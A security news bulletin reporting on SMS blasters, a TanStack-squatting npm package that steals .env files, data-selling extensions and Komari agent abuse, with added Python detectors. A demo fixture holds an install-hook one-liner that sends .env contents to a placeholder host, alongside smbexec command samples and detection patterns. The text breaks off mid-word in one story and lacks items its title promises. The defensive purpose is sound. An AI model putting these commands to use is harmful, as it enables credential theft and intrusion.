Threat Intelligence, Apr 30, 2026

ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories

Weekly threat bulletin covers SMS blaster arrests, npm supply chain attack, browser extensions selling user data, and

Summary

A comprehensive threat briefing highlighting multiple security incidents: Canadian authorities arrested three men operating SMS blasters mimicking cell towers for phishing; a malicious npm package impersonated TanStack to steal environment variables from developers; 80 browser extensions openly resell data from 6.5M+ users; and threat actors abused the Komari agent tool in real-world intrusions using stolen VPN credentials.

Full text

ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories
Ravie Lakshmanan, Apr 30, 2026, Hacking News / Cybersecurity News

The internet is noisy this week. We are seeing some wild new tactics, like people using fake cell towers to send scam texts, while some developers are unknowingly installing packages that read their private files during a routine install. It is definitely a busy time to be online.

Security is always a moving target. Millions of remote-access servers are sitting exposed on the internet, tens of thousands of them with no authentication at all, and old software bugs keep showing up in the most unexpected places. Even with the right fixes available, staying one step ahead is a full-time job for all of us.

Data is shifting in strange ways, too. Some browser extensions are now legally selling user browsing history for profit, and new kits are making it simpler for almost anyone to launch a campaign. You have to see these latest updates to believe them. Let's look at the full list...

SMS blaster phishing crackdown: Canadian Authorities Arrest 3 Men for Alleged Use of SMS Blaster

Canadian authorities have arrested three men for operating an SMS blaster, a device that masquerades as a cellular base station in order to push phishing texts to nearby phones. These tools trick handsets into connecting to them by emitting signals that mimic a legitimate tower, which lets the operator deliver messages without ever touching the carrier network or its spam filtering. "An SMS blaster works by mimicking a legitimate cellular tower. When nearby phones connect to it, users receive fraudulent text messages that appear to come from trusted organizations," authorities said. "These messages often prompt recipients to click on links that lead to fake websites designed to capture personal information, including banking credentials and passwords." The three men face 44 charges in connection with the crime. Tens of thousands of devices connected to the blaster over several months, an official said. This is the first time an SMS blaster has been spotted in the country.
npm brandsquat data theft: npm Package Brand-Squats TanStack to Exfiltrate Environment Variables

A new supply chain attack leveraged an npm package impersonating TanStack to ship malicious versions that exfiltrate environment variables from developers' machines during install. The package, named tanstack, is designed to "silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint," Socket said. The malicious package is maintained by a user named "sh20raj." Versions 2.0.4 through 2.0.7 are confirmed malicious. Note that TanStack's own packages are published under the @tanstack npm scope (for example @tanstack/react-query); the unscoped name tanstack is not one of them, so any lockfile entry for it deserves a look.

Update: In a post shared on X, Shaswat Raj (@SH20RAJ), the developer behind the package, apologized for his actions and claimed he demanded $10,000 from Tanner Linsley, creator of TanStack, as he "thought it was acceptable to ask for a bounty" for returning the name. The developer also stated the malicious code was part of "random testing" for jailbreaking Google Antigravity.

Extensions legally sell user data: Extension Developers Sell Data of At Least 6.5M Users

In a new analysis, LayerX found that multiple networks of browser extensions collect user data and resell it for profit. Unlike malicious extensions that conceal their behavior behind some harmless functionality, the 80 extensions identified explicitly state in their privacy policies that they collect and sell the data of users who install them. "A network of 24 media extensions that are installed on 800,000 users and collect viewing data and demographic information on major streaming platforms such as Netflix, Hulu, Disney+, Amazon Prime Video, HBO, Apple TV, and others," LayerX said. "12 separate ad blockers with a combined install base of over 5.5 million users openly selling user data. Nearly 50 other extensions, with over 100,000 users in aggregate, that collected and resold users' browsing data."
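Returning to the tanstack brand-squat above: the theft happens in an install-time lifecycle hook, so it can be caught by reading manifests rather than by running anything. The script below is an added example, not code from Socket or from the TanStack project. It walks node_modules, parses each package.json and flags two things: packages whose name and version fall in the range Socket reported as malicious, and any preinstall/install/postinstall script (npm runs these automatically when a dependency is installed) whose text references .env files or an outbound transfer. The keyword heuristic, the placeholder collector endpoint and the sample tree that demo() builds in a temporary directory are this example's own assumptions, not Socket's detection rules.

```python
"""Audit a Node.js dependency tree for install-time exfiltration patterns.

Added example, not code from Socket or from the TanStack project. The
known-bad entry is the 'tanstack' brand-squat as reported by Socket
(versions 2.0.4 through 2.0.7); the keyword heuristic and the sample tree
built in demo() are this example's own assumptions.
"""
import json
import os
import re
import tempfile

# name -> inclusive (low, high) version range confirmed malicious
KNOWN_BAD = {"tanstack": ((2, 0, 4), (2, 0, 7))}

# Lifecycle hooks npm runs automatically when a dependency is installed
LIFECYCLE = ("preinstall", "install", "postinstall")

# Heuristic: script text that touches .env files or moves data off-host
SUSPICIOUS = re.compile(r"\.env\b|curl |wget |fetch\(|https?://|child_process", re.I)


def parse_version(text):
    """'2.0.7-beta.1' -> (2, 0, 7); non-numeric components become 0."""
    nums = []
    for part in re.split(r"[.+-]", text)[:3]:
        nums.append(int(part) if part.isdigit() else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def check_package(pkg):
    """Return findings (strings) for one parsed package.json dict."""
    findings = []
    name = pkg.get("name", "")
    version = pkg.get("version", "0.0.0")
    if name in KNOWN_BAD:
        low, high = KNOWN_BAD[name]
        if low <= parse_version(version) <= high:
            findings.append(f"{name}@{version}: known malicious version range")
    scripts = pkg.get("scripts") or {}
    for hook in LIFECYCLE:
        script = scripts.get(hook, "")
        if SUSPICIOUS.search(script):
            findings.append(f"{name}@{version}: {hook} hook reads .env or calls out: {script!r}")
    return findings


def audit_tree(root):
    """Scan every package.json below any node_modules directory under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "node_modules" not in dirpath or "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                pkg = json.load(fh)
            except ValueError:
                continue  # malformed manifest; out of scope for this check
        findings.extend(check_package(pkg))
    return findings


def demo():
    """Build a constructed (not real) node_modules tree and audit it."""
    root = tempfile.mkdtemp()
    clean = {"name": "left-pad", "version": "1.3.0",
             "scripts": {"test": "node test.js"}}
    # Constructed stand-in for the reported behaviour: read .env, POST it out.
    # The endpoint is a placeholder, not the real attacker infrastructure.
    squat = {"name": "tanstack", "version": "2.0.5",
             "scripts": {"postinstall": "node -e \"const fs=require('fs');"
                         "fetch('https://collector.example.invalid/',"
                         "{method:'POST',body:fs.readFileSync('.env')})\""}}
    for pkg in (clean, squat):
        path = os.path.join(root, "node_modules", pkg["name"])
        os.makedirs(path)
        with open(os.path.join(path, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(pkg, fh)
    return audit_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point audit_tree() at a checked-out project to scan what is already installed. The structural fix is to stop npm from running lifecycle hooks at all (npm install --ignore-scripts, or ignore-scripts=true in .npmrc); that blocks this whole class of install-time theft, at the cost of packages that legitimately need a postinstall step such as native builds, which can then be allow-listed explicitly.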
Komari tool weaponized in attacks: First Recorded Abuse of Komari Agent

Huntress has revealed that unknown threat actors used stolen VPN credentials to pivot into a Windows workstation belonging to an unspecified organization via Impacket's smbexec.py, and dropped a SYSTEM-level backdoor using the Komari agent, a Go-based remote-control, monitoring, and management tool. The development marks the first publicly documented case of the tool being abused in a real-world intrusion. It also illustrates how bad actors are increasingly turning to publicly available, legitimate tools to conduct attacks. "Komari is not a telemetry tool that happens to be abusable - it is a bidirectional control channel by design. The agent opens a persistent WebSocket to its server and accepts three server-to-agent event types out of the box: exec (arbitrary command execution via PowerShell / sh), terminal (interactive PTY reverse shell in the operator's browser), and ping (ICMP / TCP / HTTP probing)," Huntress said. "All three are enabled by default." Whereas other tools like Velociraptor and SimpleHelp that have been abused by threat actors typically act as a means to an end, Komari gives an operator arbitrary command execution, an interactive PTY reverse shell, and network probing by default, over a TLS-fronted WebSocket, so a single agent install is a complete backdoor.

Next-gen phishing kits escalate: New Saiga 2FA and Phoenix System Phishing Kits Spotted

Researchers have detailed two new phishing kits named Saiga 2FA and Phoenix System that have been linked to email and SMS phishing attacks. According to Barracuda, Saiga 2FA goes beyond traditional adversary-in-the-middle (AitM) features by integrating tools like FM Scanner for extracting and analyzing mailbox content. "Saiga 2FA is an example of how phishing kits are evolving into application-level platforms," the company said.
"Unlike traditional phishing kits, Saiga integrates infrastructure, automation, and post-compromise capabilities into a unified system, supporting advanced and highly targeted campaigns." Phoenix System, on the other hand, has been tied to over 2,500 phishing domains since January 2025 and relies on IP-based filtering and geofencing for precision targeting. It is assessed to be the successor to the now-defunct Mouse System. "The campaigns are delivered via SMS, potentially leveraging fake Base Transceiver Stations (BTS) to bypass carrier-level filtering and allow threat actors to send messages that appear under the brand names of trusted organizations directly to victims," Group-IB said. "The campaign has so far targeted more than 70 organizations across the financial services, telecommunications, and logistics sectors globally."

Mass exposure of remote access servers: Exposed RDP and VNC Servers Found

A new analysis from Forescout has found 1.8 million RDP and 1.6 million VNC servers exposed on the internet. "China accounts for 22% of exposed RDP and 70% of exposed VNC servers; the U.S. accounts for 20% and 7%; Germany accounts for 8% and 2%," the company said. "Of 91,000 RDP and 29,000 VNC servers mapped to specific industries, retail, services, and education lead RDP exposure; education, services, and healthcare lead VNC." What's more, 18% of exposed RDP servers run end-of-life Windows versions, more than 19,000 RDP servers remain vulnerable to BlueKeep (CVE-2019-0708, a pre-authentication remote code execution flaw in RDP patched in May 2019), and nearly 60,000 VNC servers have authentication disabled. Worse, more than 670 of those unauthenticated VNC servers provide direct access to OT/ICS control panels.

China-linked influence op falters: Spamouflage Attempts to Influence Tibetan Parliament-in-Exile Elections

A China-linked online influence campaign attempted to undermine the April 26 elections for the Tibetan parliament-in-exile, with little impact. The operation, part of Spamouflage, a long-running influence network linked to Beijing, used a cluster of 90 Facebook profiles and 13 Instagram profiles to push criticism of the Tibetan government-in-exile and its leadership. "The network tries to drive wedges within the community," DFRLab said. "T
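Picking up the Komari intrusion chain described earlier: the pivot was smbexec.py, which runs each command by installing a short-lived Windows service whose binary path is a cmd.exe one-liner redirecting output to a file on an admin share, and the payload was a service-level agent running as SYSTEM. Both leave an Event ID 7045 ("A service was installed in the system") record in the System log. The script below is an added example and not Huntress's detection content; it scores such records. The smbexec literals it matches (service name BTOBTO, an __output file on \\127.0.0.1\<share>, an execute.bat batch file) are Impacket defaults as the author of this example knows them and can be changed with smbexec.py command-line switches, so a miss is weak evidence. The records are constructed and flattened to key=value text, not real telemetry, and nothing about the generic agent.exe line is a claim about how Komari itself is installed.

```python
"""Score Windows Event ID 7045 (A service was installed in the system)
records for two things seen in the Komari intrusion write-up: command
execution through Impacket smbexec.py and a SYSTEM-level service whose
binary lives in a user-writable directory.

Added example, not Huntress's detection content. smbexec.py executes each
command by creating a short-lived service whose ImagePath is a cmd.exe
one-liner; the literal pieces matched below are Impacket defaults as
known to the author of this example and can be changed with smbexec.py
command-line switches. Sample records are constructed.
"""
import re

# Constructed 7045 records flattened to key=value (field names are the
# event's own; values are made up). Backslashes are doubled for Python.
SAMPLE_7045 = [
    "EventID=7045 ServiceName=BTOBTO ImagePath=%COMSPEC% /Q /c echo whoami ^> "
    "\\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c "
    "%TEMP%\\execute.bat & del %TEMP%\\execute.bat ServiceType=user mode service "
    "StartType=demand start AccountName=LocalSystem",
    # Generic dropped agent; not a claim about how Komari is actually installed
    "EventID=7045 ServiceName=agent ImagePath=C:\\Windows\\Temp\\agent.exe "
    "ServiceType=user mode service StartType=auto start AccountName=LocalSystem",
    "EventID=7045 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe "
    "ServiceType=user mode service StartType=auto start AccountName=LocalSystem",
]

# cmd one-liner: "echo <cmd> ^> \\127.0.0.1\<share>\__output ... execute.bat"
SMBEXEC_IMAGE = re.compile(
    r"%COMSPEC% /Q /c echo .+\^> \\\\127\.0\.0\.1\\\S+\\__output .*execute\.bat", re.I)
SMBEXEC_SERVICE = "BTOBTO"  # smbexec.py default service name

# Locations a low-privileged user can write to; a service should not run from them
WRITABLE_DIRS = re.compile(
    r'^"?(?:C:\\Windows\\Temp|C:\\Users\\[^\\]+|C:\\ProgramData|%TEMP%|%APPDATA%)\\', re.I)


def parse_event(record):
    """Split 'K=V K=V ...' where values may contain spaces but never ' Key='."""
    fields = {}
    for token in re.split(r" (?=[A-Za-z]+=)", record):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def classify(fields):
    """Return the reasons a 7045 record deserves attention (empty if none)."""
    if fields.get("EventID") != "7045":
        return []
    reasons = []
    image = fields.get("ImagePath", "")
    if SMBEXEC_IMAGE.search(image):
        reasons.append("smbexec-style cmd one-liner as service binary")
    if fields.get("ServiceName", "").upper() == SMBEXEC_SERVICE:
        reasons.append("smbexec default service name")
    if WRITABLE_DIRS.search(image):
        reasons.append("service binary in user-writable directory")
    # Most services run as LocalSystem, so this only adds weight to other hits
    if reasons and fields.get("AccountName") == "LocalSystem":
        reasons.append("runs as SYSTEM")
    return reasons


def scan(records):
    """Return (ServiceName, reasons) for every record that scores at least once."""
    hits = []
    for record in records:
        fields = parse_event(record)
        reasons = classify(fields)
        if reasons:
            hits.append((fields.get("ServiceName", "?"), reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_7045):
        print(f"{name}: {'; '.join(reasons)}")
```

In a SIEM the same logic reads the EventData fields directly rather than the flattened text used here. smbexec removes its service again after each command, so a 7045 followed within seconds by the service's deletion is the stronger signal; the stolen-VPN-credential entry point that preceded it is better caught at the VPN concentrator (new device, new geography, logon outside working hours) than on the endpoint.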

Indicators of Compromise

  • device — SMS blaster (fake cellular base station used to push phishing texts; hardware, not malware)
  • tool — Komari agent (legitimate Go-based remote-control and monitoring agent, abused as a SYSTEM-level backdoor)
  • phishing kit — Saiga 2FA (adversary-in-the-middle kit with mailbox extraction)
  • phishing kit — Phoenix System (SMS phishing kit, successor to Mouse System)
  • malicious package — tanstack on npm (versions 2.0.4 through 2.0.7; steals .env files at install time)

Entities

  • TanStack (product)
  • OpenEMR (product)
  • Komari (product)
  • npm (technology)
  • Impacket (technology)
  • Roblox (product)